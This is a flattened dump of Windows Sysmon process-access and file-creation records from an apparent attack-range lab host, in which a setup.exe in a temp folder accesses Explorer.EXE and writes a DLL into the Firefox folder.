13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-localization-l1-2-0.dll2021-01-18 13:59:52.114 10341000x800000000000000014184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+1